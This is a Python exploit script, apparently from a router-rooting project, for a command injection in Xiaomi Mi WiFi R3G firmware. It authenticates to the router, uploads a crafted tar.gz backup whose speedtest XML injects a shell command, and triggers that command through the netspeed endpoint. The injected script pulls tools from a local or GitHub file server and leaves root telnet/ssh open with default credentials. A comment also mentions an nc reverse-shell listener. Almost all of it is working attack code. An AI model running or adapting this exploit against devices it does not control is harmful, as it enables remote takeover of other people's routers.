-
Notifications
You must be signed in to change notification settings - Fork 283
/
Copy pathremote_command_execution_vulnerability.py
172 lines (152 loc) · 7.13 KB
/
remote_command_execution_vulnerability.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
#!/usr/bin/python
# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23.
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress,
# so you can control the contents of the files in the decompressed directory.
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml,
# and there is a command injection vulnerability.
# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security
# HOW TO RUN
# Install requirements
# pip3 install -r requirements.txt
# Run the script
# python3 remote_command_execution_vulnerability.py
import os
import shutil
import tarfile
import requests
import sys
import re
import time
import random
import hashlib
import platform
import socket
# make sure that script.sh on windows uses \n
if platform.system() == "Windows":
with open("script.sh", "rt", encoding = "UTF-8") as f:
content = f.read()
with open("script.sh", "wt", encoding = "UTF-8", newline="\n") as f:
f.write(content)
router_ip_address="miwifi.com"
#router_ip_address = "192.168.31.1"
router_ip_address = input("Router IP address [press enter for using the default '{}']: ".format(router_ip_address)) or router_ip_address
# get stok
def get_stok(router_ip_address):
try:
r0 = requests.get("http://{router_ip_address}/cgi-bin/luci/web".format(router_ip_address=router_ip_address))
except:
print ("Xiaomi router not found...")
return None
try:
mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0]
except:
print ("Xiaomi router not found...")
return None
key = re.findall(r'key: \'(.*)\',', r0.text)[0]
nonce = "0_" + mac + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000))
router_password = input("Enter router admin password: ")
account_str = hashlib.sha1((router_password + key).encode('utf-8')).hexdigest()
password = hashlib.sha1((nonce + account_str).encode('utf-8')).hexdigest()
data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password,nonce=nonce)
r1 = requests.post("http://{router_ip_address}/cgi-bin/luci/api/xqsystem/login".format(router_ip_address=router_ip_address),
data = data,
headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"})
try:
stok = re.findall(r'"token":"(.*?)"',r1.text)[0]
except:
print("Failed to get stok in login response '{}'".format(r1.text))
return None
return stok
stok = get_stok(router_ip_address) or input("You need to get the stok manually, then input the stok here: ")
print("""There two options to provide the files needed for invasion:
1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`.
2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)""")
use_local_file_server = (input("Which option do you prefer? (default: 1)") or "1") == "1"
# From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
# In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
command = "((sh /tmp/script.sh exploit) &)"
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}
if os.path.exists("build"):
shutil.rmtree("build")
os.makedirs("build")
# make config file
speed_test_filename = "speedtest_urls.xml"
with open("speedtest_urls_template.xml", "rt", encoding = "UTF-8") as f:
template = f.read()
data = template.format(router_ip_address=router_ip_address, command=command)
# print(data)
with open("build/speedtest_urls.xml", "wt", encoding = "UTF-8", newline = "\n") as f:
f.write(data)
print("****************")
print("router_ip_address: " + router_ip_address)
print("stok: " + stok)
print("file provider: " + ("local file server" if use_local_file_server else "remote github repository"))
print("****************")
# Make tar
with tarfile.open("build/payload.tar.gz", "w:gz") as tar:
tar.add("build/speedtest_urls.xml", "speedtest_urls.xml")
tar.add("script.sh")
# tar.add("busybox")
# tar.add("extras/wget")
# tar.add("extras/xiaoqiang")
# upload config file
print("start uploading config file...")
r1 = requests.post(
"http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok),
files={"image": open("build/payload.tar.gz", 'rb')},
proxies=proxies
)
# print(r1.text)
def send_test_netspeed_request(router_ip_address, stok, port):
r = requests.get(
"http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed?{}".format(router_ip_address, stok, port),
proxies=proxies
)
# print(r.text)
# exec download speed test, exec command
print("start exec command...")
if use_local_file_server:
from tcp_file_server import TcpFileServer
file_server = TcpFileServer("script_tools")
with file_server:
# The TCP file server will use a random port number.
# And this port number will be sent to the router luci web server through query parameters of testing net speed request here.
# Then in the injected `script.sh`, we can get the client IP address and file server port
# through CGI variables `REMOTE_ADDR` and `QUERY_STRING` to download needed files.
send_test_netspeed_request(router_ip_address, stok, file_server.port)
else: # Use remote github repository. port setted to 0.
send_test_netspeed_request(router_ip_address, stok, port=0)
retry = 3
delay = 1
timeout = 3
def isOpen(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
try:
s.connect((ip, int(port)))
s.shutdown(socket.SHUT_RDWR)
return True
except:
return False
finally:
s.close()
def checkHost(ip, port):
ipup = False
for i in range(retry):
if isOpen(ip, port):
ipup = True
break
else:
time.sleep(delay)
return ipup
if checkHost(router_ip_address, 22):
print("done! Now you can connect to the router using several options: (user: root, password: root)")
print("* telnet {}".format(router_ip_address))
print("* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -c 3des-cbc -o UserKnownHostsFile=/dev/null root@{}".format(router_ip_address))
print("* ftp: using a program like cyberduck")
else:
print("Warning: the process has finished, but seems like ssh connection to the router is not working as expected.")
print("* Maybe your firmware version is not supported, please have a look at https://github.com/acecilia/OpenWRTInvasion/blob/master/README.md#unsupported-routers-and-firmware-versions")
print("* Anyway you can try it with: telnet {}".format(router_ip_address))